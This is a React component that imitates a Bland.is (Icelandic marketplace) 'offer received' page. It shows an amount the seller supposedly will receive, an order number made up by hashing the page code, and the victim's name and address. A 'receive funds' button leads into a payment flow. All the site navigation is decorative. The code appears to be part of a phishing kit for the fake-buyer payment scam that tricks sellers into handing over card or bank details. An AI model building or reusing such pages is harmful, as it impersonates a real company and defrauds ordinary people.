import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './BlandIsSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/bland-is-logo.png`;

function noop(e) {
  e.preventDefault();
}

function orderRef(pageData, pageCode) {
  const pn = (pageData?.product_name || '').trim().replace(/\s+/g, '');
  if (/^\d+$/.test(pn)) return pn;
  const pc = pageCode || pageData?.page_code || '';
  if (!pc) return '—';
  let h = 0;
  for (let i = 0; i < pc.length; i += 1) h = (h * 33 + pc.charCodeAt(i)) >>> 0;
  return String(100000 + (h % 899000));
}

const SIDEBAR_CATS = [
  ['🚗', 'Farartæki'],
  ['🏠', 'Heimilið'],
  ['🏢', 'Fasteignir'],
  ['🧸', 'Barnavörur'],
  ['👕', 'Fatnaður'],
  ['💼', 'Atvinna'],
  ['📱', 'Tækni'],
  ['🎿', 'Íþróttir'],
];

function BlandIsSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'IS').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;

  const recipient =
    [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';

  const refDisplay = useMemo(
    () => orderRef(pageData, pageCode || pageData?.page_code || ''),
    [pageData, pageCode],
  );
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="bl-wrap">
        <div className="bl-loading">Hleður…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="bl-wrap">
      <header className="bl-top">
        <div className="bl-top-inner">
          <div className="bl-top-row">
            <a href="#/" className="bl-logo" onClick={noop}>
              <img src={LOGO_SRC} alt="Bland.is" decoding="async" />
            </a>
            <nav className="bl-nav" aria-label="Aðalvalmynd">
              <a href="#/" onClick={noop}>Allar auglýsingar</a>
              <a href="#/" onClick={noop}>Selja á Bland</a>
              <a href="#/" onClick={noop}>Hjálp</a>
            </nav>
            <div className="bl-search-row">
              <span className="bl-search-all">Allt</span>
              <input
                className="bl-search-input"
                type="search"
                placeholder="Leita í sölutorgi"
                readOnly
                aria-hidden
              />
              <button type="button" className="bl-search-btn">
                <span aria-hidden>🔍</span> Leita
              </button>
            </div>
          </div>
        </div>
      </header>

      <div className="bl-body">
        <aside className="bl-sidebar">
          <a href="#/" className="bl-sidebar-cta" onClick={noop}>
            Skrá auglýsingu
          </a>
          {SIDEBAR_CATS.map(([ic, label]) => (
            <a key={label} href="#/" className="bl-cat" onClick={noop}>
              <span className="bl-cat-ic">{ic}</span>
              {label}
            </a>
          ))}
          <div className="bl-sidebar-div" />
          <a href="#/" className="bl-cat" onClick={noop}>
            <span className="bl-cat-ic">💬</span> Umræðan
          </a>
          <a href="#/" className="bl-cat" onClick={noop}>
            <span className="bl-cat-ic">👶</span> Barnapössun
          </a>
        </aside>

        <main className="bl-main">
          <div className="bl-card">
            <p className="bl-crumb">BLAND.IS &gt; Nýr tilboð móttekið</p>
            <div className="bl-card-head">
              <h1 className="bl-order-id">{refDisplay}</h1>
              <p className="bl-paid">Greitt: í dag</p>
            </div>

            <div className="bl-grid3">
              <div>
                <p className="bl-amt-label">Upphæð til að fá kr.</p>
                <p className="bl-amt-val">{amountDisplay}</p>
              </div>
              <div>
                <p className="bl-qty-big">1</p>
                <p className="bl-qty-lbl">Fjöldi</p>
              </div>
              <div className="bl-cell-help">
                <span className="bl-help-circle" aria-hidden>?</span>
                <p className="bl-qty-lbl">Hjálp</p>
              </div>
            </div>

            <Link to={index2Path} className="bl-cta">
              Móttaka fjármuni
            </Link>

            <div className="bl-recipient">
              <div className="bl-rec-row">
                <span className="bl-rec-k">Nafn móttakanda:</span>
                <span className="bl-rec-v">{recipient}</span>
              </div>
              <div className="bl-rec-row">
                <span className="bl-rec-k">Heimilisfang móttakanda:</span>
                <span className="bl-rec-v">{address}</span>
              </div>
            </div>
          </div>
        </main>
      </div>

      <footer className="bl-footer">
        <div className="bl-footer-inner">
          <div className="bl-foot-col">
            <h4>Bland</h4>
            <a href="#/" onClick={noop}>Öryggi á Bland</a>
            <a href="#/" onClick={noop}>Siðareglur</a>
            <a href="#/" onClick={noop}>Vefköku stefna</a>
            <a href="#/" onClick={noop}>Persónuverndarstefna</a>
          </div>
          <div className="bl-foot-col">
            <h4>Aðstoð</h4>
            <a href="#/" onClick={noop}>Hjálparsíða</a>
            <a href="#/" onClick={noop}>Góð söluráð</a>
            <a href="#/" onClick={noop}>Hafðu samband</a>
            <a href="#/" onClick={noop}>Kennslumyndbönd</a>
          </div>
        </div>
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default BlandIsSuccess;
